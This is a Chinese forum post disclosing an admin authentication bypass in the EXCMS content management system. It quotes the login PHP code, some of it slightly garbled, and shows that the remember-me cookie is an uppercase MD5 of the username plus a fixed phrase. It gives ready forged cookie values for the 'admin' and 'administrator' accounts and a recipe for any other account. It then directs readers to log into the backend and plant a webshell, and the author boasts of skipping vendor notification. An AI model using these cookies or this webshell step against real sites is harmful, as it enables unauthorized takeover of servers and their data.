EXCMS 0day (过程精彩)
<p> 以下版本没测试 测试的是最新版本</p> <p> 在公布前几小时没有通知官方 ^_^ 哈哈</p> <p> 为什么说过程精彩呢? 看完就明白!</p> <p> 因为这个漏洞原因非一般! 同时映射出中国软件行业的悲哀!!!</p> <p> 经典对白 看代码</p> <p> 后台登录文件</p> <p> adminModulesAuthIndex.php</p> <p> </p> <p> if ( defined( "EXCMS" ) ) //在admin/index.php里有了 下面文件都是包含运行方式的</p> <p> {</p> <p> }</p> <p> if ( !defined( "EXCMS_ADMIN" ) )</p> <p> {</p> <p> exit( "Access Denied" );</p> <p> }</p> <p> $excms_action['title'] = "登录"; //标题</p> <p> $forward = $_GET['forward']; //登录后转跳的地方</p> <p> $verifycode = $EXCMS_CONFIG['login_verifycode']; //验证码。。。</p> <p> if ( $_POST['loginType'] != 1 && !empty( $_COOKIE['EXCMSADMIN'] ) )</p> <p> //迈下伏笔了!</p> <p> {</p> <p> $defaultBoxDisplay = "none";</p> <p> $BoxDisplay = "";</p> <p> $remeberInfo = explode( "&", $_COOKIE['EXCMSADMIN'] );</p> <p> //看到这里没? 神奇把?</p> <p> $remeberAdmin = $remeberInfo;</p> <p> $remeberPwd = $remeberInfo;</p> <p> //账号密码获取了(COOKIES方式?) 看下去将会发生的事情很惊天地!</p> <p> $pwdForever = strtoupper( md5( $remeberAdmin." love EXCMS forever" ) );</p> <p> //这就是中国特色! 作者 你知道良心2个字什么写吗? 你知道什么叫道德吗?</p> <p> $remeberPwd = $remeberPwd == $pwdForever ? true : false;</p> <p> $loginInputDispay = $remeberPwd ? "none" : "";</p> <p> $loginType = $remeberPwd ? 3 : 2;</p> <p> }</p> <p> else</p> <p> {</p> <p> $defaultBoxDisplay = "";</p> <p> $BoxDisplay = "none";</p> <p> $loginInputDispay = "none";</p> <p> $loginType = 1;</p> <p> }</p> <p> //下面是输出登录界面的</p> <p> 然后是CheckLogin.php 验证登录文件</p> <p> 经典对白 看代码!</p> <p> </p> <p> if ( defined( "EXCMS" ) )//index.php有了</p> <p> {</p> <p> }</p> <p> if ( !defined( "EXCMS_ADMIN" ) )</p> <p> {</p> <p> exit( "Access Denied" );</p> <p> }</p> <p> $excms_action['loadtpl'] = true;</p> <p> $adminname = trim( $param['adminname'] );</p> <p> $password = trim( $param['loginType'] == 2 ? $param['password1'] : $param['password'] );</p> <p> $rememberPwd = $param['loginType'] == 2 ? $param['savePwd'] : $param['rememberPwd'];</p> <p> $forward = $param['forward'];</p> <p> $login_fail = true;</p> <p> $error = "";</p> <p> //以上东西不用理 $param都是POST方式的</p> <p> if ( empty( $adminname ) )</p> <p> //检测账户是否为空</p> <p> {</p> <p> $error = getlangbyname( "EMPTY_ADMINNAME" );</p> <p> }</p> <p> else if ( $param['loginType'] != 3 && empty( $password ) )</p> <p> //检测这个什么东西 可能是步骤把 是否第3步和密码是否是空</p> <p> {</p> <p> $error = getlangbyname( "EMPTY_PASSWORD" );</p> <p> }</p> <p> else</p> <p> {</p> <p> if ( $param['loginType'] == 3 )</p> <p> {</p> <p> //以下内容绝非因失误做成的漏洞 以这个程序编写技术 没可能这样 可以找任何PHP高手鉴证</p> <p> $remeberInfo = explode( "&", $_COOKIE['EXCMSADMIN'] );</p> <p> $remeberAdmin = $remeberInfo;</p> <p> $remeberPwd = $remeberInfo;</p> <p> //账号密码从COOKIES里获取!</p> <p> $pwdForever = strtoupper( md5( $adminname." love EXCMS forever" ) );</p> <p> if ( $remeberPwd == $pwdForever )</p> <p> //COOKIES里的账号加密过程 比ESPCMS还简单~~</p> <p> {</p> <p> include_once( LIB_PATH."system/Admin.class.php" );</p> <p> $admin_obj = new Admin( );</p> <p> $admin = $admin_obj->getByAdminname( $adminname );</p> <p> //悲剧! 只验证了管理员账号 没有验证密码!!!</p> <p> if ( $admin )</p> <p> {</p> <p> $admin['acl'] = $admin_obj->getAdminACL( $admin['adminid'] );</p> <p> $_SESSION['admininfo'] = $admin;</p> <p> //获得管理员权限了!!!!!!!!!</p> <p> ++$_SESSION['admininfo']['logintimes'];</p> <p> $admin_obj->updateLastLogin( $admin['adminid'] );</p> <p> include_once( LIB_PATH."auth/Auth.class.php" );</p> <p> $auth = new Auth( );</p> <p> $auth->checkMenu( true );</p> <p> $excms_action['loadtpl'] = false;</p> <p> $login_fail = false;</p> <p> }</p> <p> }</p> <p> }</p> <p> else</p> <p> //跳过没有COKIES 下面就是真正的验证登录状态 请注意 是有验证密码的!</p> <p> {</p> <p> if ( $EXCMS['config']['login_verifycode'] )</p> <p> {</p> <p> $param['verifycode'] = trim( $param['verifycode'] );</p> <p> if ( $param['verifycode'] == "" )</p> <p> {</p> <p> $error = getlangbyname( "EMPTY_VERIFYCODE" );</p> <p> }</p> <p> else</p> <p> {</p> <p> include_once( LIB_PATH."util/CheckCode.class.php" );</p> <p> $checkcode = new CheckCode( );</p> <p> if ( !$checkcode->check( $param['verifycode'] ) )</p> <p> {</p> <p> $error = getlangbyname( "VERIFYCODE_FAILED" );</p> <p> }</p> <p> }</p> <p> }</p> <p> if ( empty( $error ) )</p> <p> {</p> <p> include_once( LIB_PATH."auth/Auth.class.php" );</p> <p> $auth = new Auth( );</p> <p> $loginMsg = $auth->Login( $adminname, $password );</p> <p> if ( $loginMsg['success'] )</p> <p> {</p> <p> $_SESSION['admininfo'] = $loginMsg['admininfo'];</p> <p> ++$_SESSION['admininfo']['logintimes'];</p> <p> $auth->checkMenu( true );</p> <p> if ( $rememberPwd == 1 )</p> <p> {</p> <p> $pwdForever = strtoupper( md5( $adminname." love EXCMS forever" ) );</p> <p> setcookie( "EXCMSADMIN", $adminname."&".$pwdForever, time( ) + 2592000 );</p> <p> }</p> <p> else if ( $param['loginType'] != 2 && $param['rememberMe'] == 1 )</p> <p> {</p> <p> setcookie( "EXCMSADMIN", $adminname, time( ) + 2592000 );</p> <p> }</p> <p> $login_fail = false;</p> <p> $excms_action['loadtpl'] = false;</p> <p> }</p> <p> else</p> <p> {</p> <p> $error = getlangbyname( $loginMsg['message'] );</p> <p> }</p> <p> }</p> <p> }</p> <p> }</p> <p> if ( !$login_fail )</p> <p> {</p> <p> if ( empty( $forward ) || strpos( $forward, "index.php?M=Auth" ) )</p> <p> {</p> <p> header( "Location:index.php", true );</p> <p> exit( );</p> <p> }</p> <p> header( "Location:".$forward, true );</p> <p> exit( );</p> <p> }</p> <p> $errorCls = "f";</p> <p> if ( $excms_action['loadtpl'] )</p> <p> {</p> <p> if ( !$error )</p> <p> {</p> <p> $error = getlangbyname( "LOGIN_FAILED" );</p> <p> }</p> <p> require( MODULES_PATH."Auth/Index.php" );</p> <p> }</p> <p> ?></p> <p> //分析完毕</p> <p> 最后给出EXP</p> <p> EXCMSADMIN=admin%26858A611C5651AC436D4450CE23A858D1;</p> <p> EXCMSADMIN=administrator%263E0331271F1133F9613BD49E7C4FB0CD;</p> <p> 第1个是admin</p> <p> 第2个是administrator 一般 就这2个 其他账号的话请自行结构</p> <p> 结构方法 setcookie( "EXCMSADMIN", md5( 账号." love EXCMS forever" ) );</p> <p> 然后 strtoupper一次 就是把字母都变大写</p> <p> 修改COOKIES 直接进入后台 然后自定义页面 写入网马</p> <p> 后语 这个COOKIES“漏洞”并非是记住管理登录状态</p> <p> 记住管理登录的COOKIES是 SESSION ID 验证这个</p> <p> 所以这个漏洞100%是作者留下的后门!</p> <p> </p>
頁:
[1]